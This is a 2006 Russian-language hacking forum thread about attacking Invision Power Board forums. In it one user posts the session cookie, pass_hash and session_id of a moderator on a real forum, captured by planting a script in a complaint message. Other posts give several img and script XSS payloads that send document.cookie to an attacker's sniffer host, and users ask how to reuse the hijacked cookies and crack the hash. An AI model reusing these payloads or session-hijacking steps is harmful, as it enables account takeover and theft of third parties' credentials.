• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Invision Power Board (IPB)

.to4ka
без прокси - айпи будет в логах.
с прокси в акцес.лог записывается айпи прокси (но если прокси не анонимный, твой айпи можно выловить через переменные, которые передает прокси серверу в запросе)
 
что то вроде следущего влогах..

127.0.0.1 - - [19/Jun/2006:10:57:59 +0400] "GET /index.php~ HTTP/1.0" 200 4436 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"

пусти интерпретатор перля через фрикап.. или юзай чтолиб типа парагона.. он на уровне драйверов работает
 
В перле ноль(по поводу модификации -))))-хотя кажетца нужная весч в сплойте),фрикап поставил все норм.
вот только не пойму как мне сам сплойт запустить то в перле (perl.exe)
в cmd запускал а тут в командной строке(perl.exe) что-то не работают эти значения
подскажите дураку новичку. :bang:
 
подскажите полжалуйсто, вот я отправил жалобу в одном форуме туда впихнул отсюдова скрипт, который в вашем сниффере вывел куки, если не трудно посмотрите их от форума xforce, вообщем что мне дальше делать с ними?
Код:
TIME: 27.08.2006 12:31:27
QUERY: forum_read=a%3A30%3A%бла бла бла ну сократил;%20member_id=38;%20pass_hash=1f3b38f09a756a30842fafa1c9ce05f4;%20session_id=3560d0ee06d757df0a987f425f672827
IP: 195.14.40.118
USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)
REFERER: http://www.xforce.ru/index.php?act=Msg&CODE=03&VID=in&MSID=1349
Добавлено в [time]1156698890[/time]
это куки модератора, видно админов жалоба не интересовала
 
Форум - v.2
Поэтому....
В кукисах хранится не пароль, а фикня какая-то, идентификатор... А пароль и салт даже в другой таблице Скуля хранятся, по отношению к этому хэшу... :)

Так что, ничего полезного из данного своего действия ты не получишь... :)
 
ettee
Угу, и стереть весь форум... ;)

Вандализм какой-то... :crazy:
 
да, вот я и хотел спросить как именно так сделать? эти куки подменить? в опере я ставил ставил, а смысл не вышло, просто расскажите как чтоб заработало,
и еще вопрос в каких версиях можно расшифровать хэш пароль?(можно ссылку на расшифровчик?) :baby:
 
ребят а что к запросу к снифу еще надо чтобы вот получить данные что The J4s представил?
в общем чтобы на форуме разместить картинку или ссылку
если постю картинку или ссылку то в логах только айпишка и реффер накрайняк.Тестил у себя на форуме.
Тестил еще этим http://kanick.ru/sniffer/ у себя на серве.

<script>img=new Image(); img.src="[путь к снифферу]?"+document.cookie;</script>
А как бы это в форумах задействовать? и послать на сниффер
Заранее благодарен за ответ,если есть линки на док то тоже здорово.

The J4s а ты как сам данные то получил? в общем ребят тоже нужно на снифф посыдать данные сессии но я не понимаю как-реффер и ip мне мало что дают8(
 
А как бы это в форумах задействовать? и послать на сниффер Заранее благодарен за ответ,если есть линки на док то тоже здорово.

эммм.. так же =) или ту думаешь что если форум и чат то там по разному куки прутся ? =)

вот три вариатна простейших (в случае полного отсутствия фильтрации)с тэгом img-

<img src="http://обычная картинка" style=background:url(javascript:document.images[1].src="http://снифак?"+documnet.cookie)>

<img src='javascript:img=new Image(); img.src="http://снифак?"+document.cookie';/>

<img src="http://снифак?"+document.cookie;>
 
ну про сниф понятно-свой или здесь или там
а вот я ешо про саму XSS атаку говорю
ведь форум html'евских кодов не понимает (по дефолту отключено)-как ты послал жалобу-каким кодом и какой форум-движок был? Читаю и ищу просто щас что есть уязвимое у джижков чтобы посниферить. Наподобии "Использование UTF-7 в атаках класса XSS".
 
вот помогите, я скачал тот плагин, но непонял куда пихать полученные данные, просто даже по смыслу нподходит, вот окошки
 

Вложения

  • 1.jpg
    1.jpg
    41.3 КБ · Просмотры: 193
  • 2.jpg
    2.jpg
    39 КБ · Просмотры: 178


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх